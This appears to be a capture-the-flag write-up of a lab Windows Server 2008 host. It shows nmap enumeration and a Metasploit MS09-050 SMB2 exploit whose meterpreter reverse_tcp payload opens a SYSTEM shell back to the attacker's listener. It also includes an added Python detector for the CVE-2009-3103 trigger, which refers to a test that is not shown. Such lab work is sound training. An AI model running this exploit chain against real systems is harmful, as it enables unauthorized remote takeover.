Internal - OSPG


Summary

In this writeup, we’ll exploit a vulnerable SMB service that yields unauthenticated remote code execution, compromising the host directly as SYSTEM.


Enumeration

Nmap

We’ll begin with an nmap scan.

$ sudo nmap -p- -sV -T4 192.168.130.40
PORT      STATE    SERVICE            VERSION
53/tcp    open     domain             Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds       Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: WORKGROUP)
763/tcp   filtered cycleserv
1147/tcp  filtered capioverlan
3389/tcp  open     ssl/ms-wbt-server?
5357/tcp  open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
...

Let’s inspect the SMB service further by running nmap’s SMB vulnerability scripts against it.

$ sudo nmap --script smb-vuln\* -p445 192.168.130.40
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-06 21:14 AEST
Verbosity Increased to 1.
Completed NSE at 21:15, 60.65s elapsed
Nmap scan report for 192.168.130.40
Host is up (0.32s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT

After a little more research, we discover the exploit can be found here and is exploitable via the Metasploit framework.
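From the defender’s side, the NSE output above pins the bug to a single header field: the Process ID High field of an SMB1 NEGOTIATE request, which the vulnerable srv2.sys used as a function-table index. The following is an added detection example, not code from the original post or from nmap; it assumes the NetBIOS session framing has already been stripped from each message, and treats a non-zero Process ID High in a NEGOTIATE request as anomalous (an assumption about ordinary client behaviour).

```python
import struct
from typing import Optional

# Fixed 32-byte SMB1 header (NetBIOS session header already removed).
SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72
HEADER_LEN = 32
TRIGGER_PID_HIGH = ord("&")  # 0x26, the value the advisory text names


def parse_smb1_header(data: bytes) -> dict:
    """Decode the SMB1 header fields needed for the check."""
    if len(data) < HEADER_LEN or data[:4] != SMB1_MAGIC:
        raise ValueError("not an SMB1 message")
    command = data[4]
    # Offsets 5..13: Status(4) Flags(1) Flags2(2) ProcessIDHigh(2)
    _status, _flags, _flags2, pid_high = struct.unpack_from("<IBHH", data, 5)
    # Offsets 24..31: TID(2) PIDLow(2) UID(2) MID(2)
    tid, pid_low, uid, mid = struct.unpack_from("<HHHH", data, 24)
    return {"command": command, "pid_high": pid_high, "pid_low": pid_low,
            "tid": tid, "uid": uid, "mid": mid}


def check_negotiate(data: bytes) -> Optional[str]:
    """Return a finding for a NEGOTIATE request with Process ID High set, else None."""
    hdr = parse_smb1_header(data)
    if hdr["command"] != SMB_COM_NEGOTIATE or hdr["pid_high"] == 0:
        return None
    if hdr["pid_high"] == TRIGGER_PID_HIGH:
        return "CVE-2009-3103 trigger value (0x26) in Process ID High"
    return "unusual Process ID High 0x%04x in NEGOTIATE" % hdr["pid_high"]


def build_sample_header(command: int, pid_high: int) -> bytes:
    """Constructed test header (no message body); not captured traffic."""
    return (SMB1_MAGIC + bytes([command])
            + struct.pack("<IBHH", 0, 0x18, 0xC853, pid_high)
            + b"\x00" * 8 + b"\x00\x00"           # SecurityFeatures, Reserved
            + struct.pack("<HHHH", 0, 0xFEFF, 0, 0))  # TID, PIDLow, UID, MID


def scan_messages(messages) -> list:
    """Run the check over a sequence of SMB1 messages, collecting findings."""
    findings = []
    for i, msg in enumerate(messages):
        try:
            f = check_negotiate(msg)
        except ValueError:
            continue
        if f:
            findings.append((i, f))
    return findings
```

Feeding it the three constructed headers in the test (a normal negotiate, the trigger value, and a non-negotiate command carrying the same value) yields one finding, for the second message only.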


Exploitation

MS09-050 RCE

Within our Metasploit console, we search for and use the windows/smb/ms09_050_smb2_negotiate_func_index module.

Here is the module configuration we used.

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > options

Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.130.40   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   445              yes       The target port (TCP)
   WAIT    180              yes       The number of seconds to wait for the attack to complete.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Vista SP1/SP2 and Server 2008 (x86)

After everything is lined up, we can throw our exploit.

msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > exploit

[*] Started reverse TCP handler on 192.168.49.130:4444 
[*] 192.168.130.40:445 - Connecting to the target (192.168.130.40:445)...
[*] 192.168.130.40:445 - Sending the exploit packet (951 bytes)...
[*] 192.168.130.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (175174 bytes) to 192.168.130.40
[*] Meterpreter session 1 opened (192.168.49.130:4444 -> 192.168.130.40:49159) at 2021-09-06 21:20:32 +1000

meterpreter > shell
Process 3672 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

No privilege escalation is needed since we are already nt authority\system on the system!